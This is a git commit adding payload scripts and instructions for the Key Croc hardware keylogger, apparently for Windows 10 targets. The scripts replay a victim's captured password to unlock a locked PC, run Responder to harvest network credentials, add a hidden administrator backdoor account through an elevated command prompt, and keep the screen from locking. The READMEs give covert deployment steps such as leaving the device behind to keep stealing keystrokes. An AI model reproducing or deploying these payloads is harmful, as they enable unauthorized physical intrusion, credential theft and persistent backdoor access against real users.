commit
4e1811fa3a
|
@ -0,0 +1,42 @@
|
||||||
|
# Skeleton Key
|
||||||
|
### Deploy to target, come back later to unlock automatically - no checking of logs necessary
|
||||||
|
---
|
||||||
|
Arm the Key Croc with an automatic lockpick for Windows 10! After preparing the Key Croc for deployment, place it on a target with a lock screen. Once the target unlocks the PC, their first entry into the Key Croc will be their password. The Skeleton Key payload listens for your secret command, and then unlocks the computer automatically with that password.
|
||||||
|
|
||||||
|
Like most skeleton keys, this will not be 100% reliable. The target may enter in the wrong password, or maybe drum on the keys before logging in.
|
||||||
|
|
||||||
|
The payload was tested on Windows 10 for both PIN and passwords.
|
||||||
|
|
||||||
|
*Setup*
|
||||||
|
1. Connect the Key Croc and place into arming mode
|
||||||
|
2. Save offline and then delete all logs in the loot directory
|
||||||
|
3. Place both the `skeletonkey.txt` and `skeletonagain.txt` in the payloads directory
|
||||||
|
4. Optionally change the MATCH string to a unique passphrase of your choice
|
||||||
|
5. Eject the Key Croc safely
|
||||||
|
|
||||||
|
The Key Croc is ready for deployment.
|
||||||
|
|
||||||
|
*Deploy*
|
||||||
|
1. Ensure the target is on a lock screen
|
||||||
|
2. Remove target keyboard, place the Key Croc on the USB, and connect keyboard to Key Croc when LED is white
|
||||||
|
3. Cross your fingers and leave
|
||||||
|
|
||||||
|
*Turn Skeleton Key*
|
||||||
|
|
||||||
|
You get two shots at it! Afterwards, just analyze the log file.
|
||||||
|
|
||||||
|
1. Do not disconnect the Key Croc
|
||||||
|
2. Enter an incorrect password so you receive "The PIN / password is incorrect - try again" message with the OK button. _Do not click the OK button_ - instead...
|
||||||
|
3. Type the secret phrase `skeletonknock`
|
||||||
|
4. Didn't work? They may have used the mouse to get to the password screen. Repeat step #2 and then try `skeletonagain`
|
||||||
|
5. Still no luck? Looks like it isn't your day, but next time you should have better luck. Open the log on a different PC or via SSH to get the password.
|
||||||
|
|
||||||
|
*Now* remove the Key Croc and be on your merry way
|
||||||
|
|
||||||
|
*Why SkeletonKnock? I thought this was called _skeleton key_*
|
||||||
|
You're right! But I thought it less likely for anyone to type `skeletonknock`.
|
||||||
|
|
||||||
|
*What’s up with the name SaintCrossbow?*
|
||||||
|
Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool.
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,15 @@
|
||||||
|
# Title: SkeletonAgain
|
||||||
|
# Description: Plays back last likely password - this time assuming logged in with mouse
|
||||||
|
# Author: SaintCrossbow
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Bypass
|
||||||
|
#
|
||||||
|
# Usage: Enter an invalid key, press enter, type "skeletonagain" to enter the last password
|
||||||
|
MATCH skeletonagain
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 25 | awk -F 'ꬾ' '{print $1}')
|
||||||
|
QUACK ENTER
|
|
@ -0,0 +1,15 @@
|
||||||
|
# Title: SkeletonKey
|
||||||
|
# Description: Plays back last likely password
|
||||||
|
# Author: SaintCrossbow
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Bypass
|
||||||
|
#
|
||||||
|
# Usage: Enter an invalid key, press enter, type "skeletonknock" to enter the last password
|
||||||
|
MATCH skeletonknock
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK ESCAPE
|
||||||
|
QUACK STRING $(cat /root/loot/croc_char.log | sed 's/[[]ENTER[]]/ꬾ/g' | sed -e 's/\[[^][]*\]//g' | head -c 26 | tail -c 25 | awk -F 'ꬾ' '{print $1}')
|
||||||
|
QUACK ENTER
|
|
@ -0,0 +1,32 @@
|
||||||
|
# Timed Responder Attack
|
||||||
|
### Hang back for a few extra minutes and collect network credentials
|
||||||
|
---
|
||||||
|
After you've attached the Key Croc, why not take the opportunity to try for some network credentials? Start with your MATCH phrase and a responder attack runs for the total minutes you specify. You'll want to hang around for completion though: the target will briefly lose keyboard connection twice. Afterwards you can leave it behind to continue to quietly gather keystrokes.
|
||||||
|
|
||||||
|
The payload was tested on Windows 10.
|
||||||
|
|
||||||
|
*Setup*
|
||||||
|
1. Connect the Key Croc on your PC in ARMING mode
|
||||||
|
2. If you haven't already, get the additional tools using the INSTALL_EXTRAS script
|
||||||
|
3. Place `timedresponder.txt` in the payloads directory
|
||||||
|
4. Change the `GATHER_FOR` variable to the number of seconds to run responder
|
||||||
|
5. Optionally change the MATCH string to a unique passphrase of your choice
|
||||||
|
6. Eject the Key Croc safely
|
||||||
|
|
||||||
|
The Key Croc is ready for deployment.
|
||||||
|
|
||||||
|
*Deploy*
|
||||||
|
1. Connect the Key Croc to target in attack configuration
|
||||||
|
2. Look around slyly and make sure you are in the clear for a few minutes
|
||||||
|
3. Start responder by typing `__responder`
|
||||||
|
4. The Key Croc will go into both HID and RNDIS mode, indicated by LED magenta
|
||||||
|
5. While responder is running, the LED will flash with a single yellow blink
|
||||||
|
6. The logs will be copied to /root/loot, indicated by a fast white blink
|
||||||
|
7. A brief LED flash of green means your attack is complete.
|
||||||
|
|
||||||
|
Take the croc with you, or leave it behind to continue stealing keystokes.
|
||||||
|
|
||||||
|
*What’s up with the name SaintCrossbow?*
|
||||||
|
Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool.
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
# Title: Start responder for n minutes while still being in keyboard mode
|
||||||
|
# Note: Not fully covert - allow for brief keyboard outage
|
||||||
|
# Author: Saint Crossbow
|
||||||
|
# Version: 1.0
|
||||||
|
|
||||||
|
MATCH __responder
|
||||||
|
|
||||||
|
# Gather for however many minutes (e.g. 120 = 2 minutes)
|
||||||
|
GATHER_FOR=120
|
||||||
|
|
||||||
|
echo "[*] Starting attack"
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE HID RNDIS_ETHERNET RNDIS_SPEED_2000000 &
|
||||||
|
sleep 15
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
/tools/responder/Responder.py -I usb0 -f -w -r -d -F &
|
||||||
|
bpid=$!
|
||||||
|
sleep $GATHER_FOR
|
||||||
|
|
||||||
|
LED CLEANUP
|
||||||
|
echo "[*] Stopping attack"
|
||||||
|
kill $bpid
|
||||||
|
wait $bpid
|
||||||
|
|
||||||
|
LED FINISH
|
||||||
|
cp /tools/responder/logs/*.log /root/loot/
|
||||||
|
ATTACKMODE HID
|
||||||
|
sleep 2
|
||||||
|
LED OFF
|
|
@ -0,0 +1,30 @@
|
||||||
|
# Back Door Account
|
||||||
|
### Add an account to an unlocked PC before the keystrokes are caught
|
||||||
|
---
|
||||||
|
Simple script that adds an administrative user for later access. Only works, of course, if the PC is unlocked. However this is a nice complement to the SkeletonKey payload: just add the new user when you unlock the PC.
|
||||||
|
|
||||||
|
The payload was tested on Windows 10.
|
||||||
|
|
||||||
|
*Setup*
|
||||||
|
1. Connect the Key Croc and place into arming mode
|
||||||
|
2. Place `addadmin.txt` in the payloads directory
|
||||||
|
3. Change the `BACKDOOR_USER` variable to something that will blend into the environment
|
||||||
|
4. Change the `BACKDOOR_PASS` variable to a reasonably strong password
|
||||||
|
5. Optionally change the MATCH string to a unique passphrase of your choice
|
||||||
|
6. Eject the Key Croc safely
|
||||||
|
|
||||||
|
The Key Croc is ready for deployment.
|
||||||
|
|
||||||
|
*Deploy*
|
||||||
|
1. Connect the Key Croc to target in attack configuration
|
||||||
|
2. If you are lucky enough to find yourself at an unlocked screen, type `__addadmin`
|
||||||
|
3. With some luck, your user name and password will be added
|
||||||
|
|
||||||
|
*Cleanup*
|
||||||
|
1. Remove the user from the admin group: `net localgroup administrators officeadmin /delete`
|
||||||
|
2. Remove the user from the system: `net users officeadmin /delete`
|
||||||
|
|
||||||
|
*What’s up with the name SaintCrossbow?*
|
||||||
|
Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool.
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,26 @@
|
||||||
|
# Title: Add a backdoor user to access PC later (assuming PC is unlocked)
|
||||||
|
# Author: Saint Crossbow
|
||||||
|
# Version: 1.0
|
||||||
|
|
||||||
|
MATCH __addadmin
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
BACKDOOR_USER="officeadmin"
|
||||||
|
BACKDOOR_PASS="changethis"
|
||||||
|
|
||||||
|
sleep 2
|
||||||
|
Q GUI r
|
||||||
|
Q STRING "cmd"
|
||||||
|
Q CTRL-SHIFT ENTER
|
||||||
|
sleep 2
|
||||||
|
Q ALT Y
|
||||||
|
sleep 1
|
||||||
|
Q STRING "net user /add $BACKDOOR_USER $BACKDOOR_PASS"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "net localgroup administrators $BACKDOOR_USER /add"
|
||||||
|
Q ENTER
|
||||||
|
Q STRING "exit"
|
||||||
|
Q ENTER
|
||||||
|
LED FINISH
|
||||||
|
sleep 1
|
||||||
|
LED OFF
|
|
@ -0,0 +1,25 @@
|
||||||
|
# Keep Alive
|
||||||
|
### Don't let the PC fall asleep
|
||||||
|
---
|
||||||
|
Like having a mouse wiggler on for your Key Croc, except with keys! Unlike a regular mouse wiggler, this will constantly press Control - so typing while it is active is not recommended.
|
||||||
|
|
||||||
|
The payload was tested on Windows 10. It may be run with seconds specified as a parameter while in SSH (just remove the MATCH).
|
||||||
|
|
||||||
|
*Setup*
|
||||||
|
1. Connect the Key Croc and place into arming mode
|
||||||
|
2. Place `keepalive.txt` in the payloads directory
|
||||||
|
3. Change the `TOTAL_SEC` variable to increase time - default is an hour.
|
||||||
|
4. Optionally change the MATCH string to a unique passphrase of your choice
|
||||||
|
5. Eject the Key Croc safely
|
||||||
|
|
||||||
|
The Key Croc is ready for deployment.
|
||||||
|
|
||||||
|
*Deploy*
|
||||||
|
1. Connect the Key Croc to target in attack configuration
|
||||||
|
2. Type `__staylive` to start the keep awake routine: it will flash yellow while it is active
|
||||||
|
|
||||||
|
*What’s up with the name SaintCrossbow?*
|
||||||
|
|
||||||
|
Most of it is because it wasn’t taken. Other than that, I’m a big fan of the literary Saint by Leslie Charteris: a vigilante type who very kindly takes on problem people, serves his own justice, and has a great deal of fun doing it. Also, I just can’t help but think that crossbows are cool.
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
# Title: Keep the PC from locking - default 1 hour
|
||||||
|
# When executed from command line without MATCH can specify time
|
||||||
|
# Author: Saint Crossbow
|
||||||
|
# Version: 1.0
|
||||||
|
|
||||||
|
MATCH __staylive
|
||||||
|
LED ATTACK
|
||||||
|
if [ $# -eq 0 ]
|
||||||
|
then
|
||||||
|
TOTAL_SEC=3600
|
||||||
|
echo "Default time of 60 minutes used"
|
||||||
|
else
|
||||||
|
echo "Running for total $1 seconds"
|
||||||
|
TOTAL_SEC=$1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo $TOTAL_SEC
|
||||||
|
|
||||||
|
i=1
|
||||||
|
while [ "$i" -le "$TOTAL_SEC" ]; do
|
||||||
|
echo -n "."
|
||||||
|
Q CONTROL
|
||||||
|
sleep 1
|
||||||
|
i=$(($i + 1))
|
||||||
|
done
|
||||||
|
|
||||||
|
echo
|
||||||
|
LED FINISH
|
||||||
|
sleep 1
|
||||||
|
LED OFF
|
Loading…
Reference in New Issue